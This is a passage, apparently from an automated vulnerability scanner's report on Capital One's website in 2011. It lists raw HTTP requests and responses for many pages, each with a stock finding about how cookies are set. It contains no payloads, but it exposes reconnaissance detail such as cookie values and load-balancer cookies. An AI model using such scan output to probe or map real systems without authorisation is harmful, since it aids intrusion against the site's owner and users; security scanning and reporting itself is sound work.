HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:17 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: itc=CAPITALONE1112G1INTMKTGDF; expires=Sun, 03-Apr-2011 22:12:17 GMT; path=/; domain=.capitalone.com Set-Cookie: dbPhoneNumber=HSRLutmi4O6tZPn79JErD; path=/; domain=.capitalone.com Set-Cookie: coirule=deleted; expires=Tue, 02-Feb-2010 22:12:16 GMT; path=/; domain=.capitalone.com Set-Cookie: LP_GROUP=NDBCHAT_T_GRP; expires=Sun, 03-Apr-2011 21:12:17 GMT; path=/; domain=.capitalone.com Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:17 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=utf-8 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 10034
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <h ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /directbanking/online-savings-accounts/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:12 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: coirule=deleted; expires=Tue, 02-Feb-2010 22:12:11 GMT; path=/; domain=.capitalone.com Set-Cookie: LP_GROUP=NDBCHAT_T_GRP; expires=Sun, 03-Apr-2011 21:12:12 GMT; path=/; domain=.capitalone.com Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:11 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=utf-8 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 32067
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <h ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /directbanking/online-savings-accounts/high-yield-money-market-account/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:08 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: coirule=deleted; expires=Tue, 02-Feb-2010 22:12:07 GMT; path=/; domain=.capitalone.com Set-Cookie: LP_GROUP=NDBCHAT_T_GRP; expires=Sun, 03-Apr-2011 21:12:08 GMT; path=/; domain=.capitalone.com Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:07 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=utf-8 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 26985
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <h ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /directbanking/online-savings-accounts/interestplus-online-savings-account/?linkid=WWW_1009_Z_A0B2084C1F86D22A0E1FFBF38F9G1F85H5AF4_HOME_C7_01_T_SP29&itc=CAPITALONE1112FYINTMKTGDF&number=HSRLutmi4O6tZPn79JErD HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:07 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: itc=CAPITALONE1112FYINTMKTGDF; expires=Sun, 03-Apr-2011 22:12:07 GMT; path=/; domain=.capitalone.com Set-Cookie: dbPhoneNumber=HSRLutmi4O6tZPn79JErD; path=/; domain=.capitalone.com Set-Cookie: coirule=deleted; expires=Tue, 02-Feb-2010 22:12:06 GMT; path=/; domain=.capitalone.com Set-Cookie: LP_GROUP=NDBCHAT_T_GRP; expires=Sun, 03-Apr-2011 21:12:07 GMT; path=/; domain=.capitalone.com Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:06 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=utf-8 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 29344
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> < ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /directbanking/online-savings-accounts/rewards-money-market-account/index.php?linkid=WWW_1009_Z_A0B2084C1F86D22A0E1FFBF38F9G1F85H5AF4_HOME_C7_05_T_DBREWMMA&itc=CAPITALONE1112G1INTMKTGDF&number=HSRLutmi4O6tZPn79JErD HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:13 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: itc=CAPITALONE1112G1INTMKTGDF; expires=Sun, 03-Apr-2011 22:12:13 GMT; path=/; domain=.capitalone.com Set-Cookie: dbPhoneNumber=HSRLutmi4O6tZPn79JErD; path=/; domain=.capitalone.com Set-Cookie: coirule=deleted; expires=Tue, 02-Feb-2010 22:12:12 GMT; path=/; domain=.capitalone.com Set-Cookie: LP_GROUP=NDBCHAT_T_GRP; expires=Sun, 03-Apr-2011 21:12:13 GMT; path=/; domain=.capitalone.com Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:12 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=utf-8 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 31377
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> < ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /financialeducation/?linkid=WWW_1009_Z_A0B2084C1F86D22A0E1FFBF38F9G1F85H5AF4_GBLFO_F1_06_T_FIN HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:40 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesb=c_m%3D4; expires=Thu, 02-Feb-2012 22:12:40 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 27487
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>Finan ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /financialeducation/creditcardact/index.php HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:39 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesb=c_m%3D2; expires=Thu, 02-Feb-2012 22:12:39 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 24653
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>Credi ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /fraud/prevention/index.php HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:37 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesb=c_m%3D1; expires=Thu, 02-Feb-2012 22:12:37 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 37509
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>Capit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /loans/?linkid=WWW_1009_PERS_A0B2084C1F86D22A0E1FFBF38F9G1F85H5AF4_HOME_H1_14_T_LNHPR HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:23 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; expires=Fri, 04-Mar-2011 22:12:23 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 22518
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Capital One offer ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /onlinebanking/overview.php HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:36 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesb=c_m%3D2; expires=Thu, 02-Feb-2012 22:12:36 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 23649
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title> Capi ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /personalloans/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:27 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:27 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 21748
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Personal Loans: A ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /protection/privacy/index.php HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:36 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesb=c_m%3D2; expires=Thu, 02-Feb-2012 22:12:36 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 23417
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>Capit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /protection/security/index.php HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:37 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesb=c_m%3D2; expires=Thu, 02-Feb-2012 22:12:37 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 26756
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>Capit ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /redirect.php?Log=1&linkid=WWW_1009_CARD_A0B2084C1F86D22A0E1FFBF38F9G1F85H5AF4_HOME_H1_04_T_EXP&dest=https://cardfinder.capitalone.com/CapOne/findMyOffer.do?ex=R&pr=&id=&tg=4 HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 302 Found Date: Wed, 02 Feb 2011 22:11:48 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponecc=channel%3DUNS%2A20090715%3Atestgroup%3Dtg11%2A20110113; path=/; domain=.capitalone.com Set-Cookie: caponesn=f5b8a110S04syM9LTU6OK7YyMrNSCvULtjIyMLA0MDc01S1JNzTUNTIwNAQiYyXrOENTY3NjAA%3D%3D; expires=Wed, 01-Jan-2020 00:00:00 GMT; path=/; domain=.capitalone.com Set-Cookie: caponesn=f9be28ebS04syM9LTU6OK7YyMrNSCvULtjIyMLA0MDc01S1JNzTUNTIwNAQiYyXrOENTY3PjmqKSgtyQ1OKS9KL80gKgNkuILkNDoEagojygcQA%3D; expires=Wed, 01-Jan-2020 00:00:00 GMT; path=/; domain=.capitalone.com Location: https://cardfinder.capitalone.com/CapOne/findMyOffer.do?ex=R&pr=&id=&tg=20&pnt=ZZZZ00ZZZZZZZZZZZZZZ&ch=UNS&wtg=11 Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Content-Length: 1 Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rewards/index.php HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:11:50 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesb=c_m%3D2; expires=Thu, 02-Feb-2012 22:11:50 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 26772
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>Credi ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rewards/service-login.php HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:11:49 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesb=c_m%3D4; expires=Thu, 02-Feb-2012 22:11:49 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 20960
